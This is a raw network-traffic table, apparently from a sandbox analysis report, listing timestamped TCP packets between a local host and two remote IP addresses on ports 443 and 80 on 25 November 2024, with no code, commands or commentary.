                                                                                                                                                                                Nov 25, 2024 14:07:02.135154963 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.135195971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.138384104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.138434887 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.138465881 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.142637968 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.142690897 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.142730951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.145822048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.145875931 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.145898104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.149147034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.149238110 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.149271011 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.179900885 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.271856070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.271869898 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.271953106 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.271987915 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274914980 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274951935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.274964094 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.274983883 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.275027037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.278944969 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.278956890 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.279009104 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.279037952 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.281987906 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.282044888 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.282054901 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.285167933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.285227060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.285235882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.289336920 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.289393902 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.289402962 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.292229891 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.292279959 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.292289972 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.295447111 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.295521021 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.295531034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.299349070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.299392939 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.299401999 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.302921057 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.302973986 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.302983046 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.306009054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.306055069 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.306063890 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.309257030 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.309309006 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.309319019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.313153982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.313206911 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.313215971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.316283941 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.316333055 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.316342115 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.319406986 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.319459915 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.319470882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.323764086 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.323817015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.323827028 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.412417889 CET8049171172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.412467957 CET4917180192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:02.535341978 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.535413027 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762213945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762224913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762298107 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762311935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762325048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762367964 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762387991 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762435913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762485981 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762495041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762506962 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762546062 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762556076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762573957 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762619019 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762628078 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762939930 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.762984037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.762990952 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763046980 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763101101 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.763108969 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763310909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763380051 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763390064 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.763398886 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.763428926 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.772478104 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.772495985 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.772520065 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.772531033 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.772583961 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.772593021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.772619009 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.772658110 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.792309999 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.792331934 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.792349100 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.792365074 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.792387009 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.792399883 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.792422056 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.792443991 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.996099949 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011446953 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011476994 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011539936 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011548996 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011560917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011579037 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011591911 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011601925 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011614084 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011635065 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011635065 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011635065 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011641026 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.011663914 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.011663914 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012022018 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012027979 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012079000 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012103081 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012106895 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012116909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012166023 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012176037 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012193918 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012259960 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012558937 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012564898 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012613058 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012635946 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012639999 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012648106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012665033 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012737036 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.012746096 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.012758970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.013093948 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.013168097 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.081056118 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.081178904 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.081197023 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.084116936 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.084178925 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.084188938 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.086713076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.086795092 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.086803913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.089384079 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.089452982 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.089461088 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.092880011 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.092937946 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.092950106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.095417976 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.095483065 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.095490932 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.098007917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.098062992 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.098073006 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.101453066 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.101526976 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.101536989 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.104784966 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.104846954 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.104856014 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.106673956 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.106806040 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.106815100 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.109668016 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.109734058 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.109743118 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.113038063 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.113101959 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.113111019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.115879059 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.115946054 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.115956068 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.118298054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.118361950 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.118371010 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.121730089 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.121795893 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.121807098 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.124439001 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.124500036 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.124511003 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.282726049 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.282865047 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.282902002 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.285301924 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.285372972 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.285382986 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.287897110 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.287976980 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.287987947 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.291434050 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.291500092 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.291512012 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.293968916 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.294035912 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.294044971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.297327042 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.297420025 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.297427893 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.299921989 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.299984932 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.299993038 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.302647114 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.302738905 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.302747965 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.305969000 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.306045055 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.306054115 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.308581114 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.308626890 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.308638096 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.308655977 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.311819077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.311899900 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.311908007 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.314876080 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.314956903 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.314965963 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.317955971 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.318063974 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.318072081 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.320215940 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.320291042 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.320297956 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.322844028 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.322910070 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.322916985 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.326245070 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.326343060 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.326350927 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.485598087 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.485747099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.485795021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.487687111 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.487750053 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.487770081 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.490076065 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.490138054 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.490166903 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.492667913 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.492758989 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.492775917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.495208979 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.495284081 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.495299101 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.498545885 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.498637915 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.498651981 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.501377106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.501461983 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.501492977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.504252911 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.504328966 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.504343987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.507230043 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.507330894 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.507344007 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.509932995 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.510009050 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.510021925 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.512995005 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.513072014 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.513087034 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.515906096 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.515976906 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.515990973 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.519123077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.519201994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.519215107 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.521626949 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.521713018 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.521725893 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.524162054 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.524528980 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.524542093 CET44349168193.30.119.205192.168.2.22
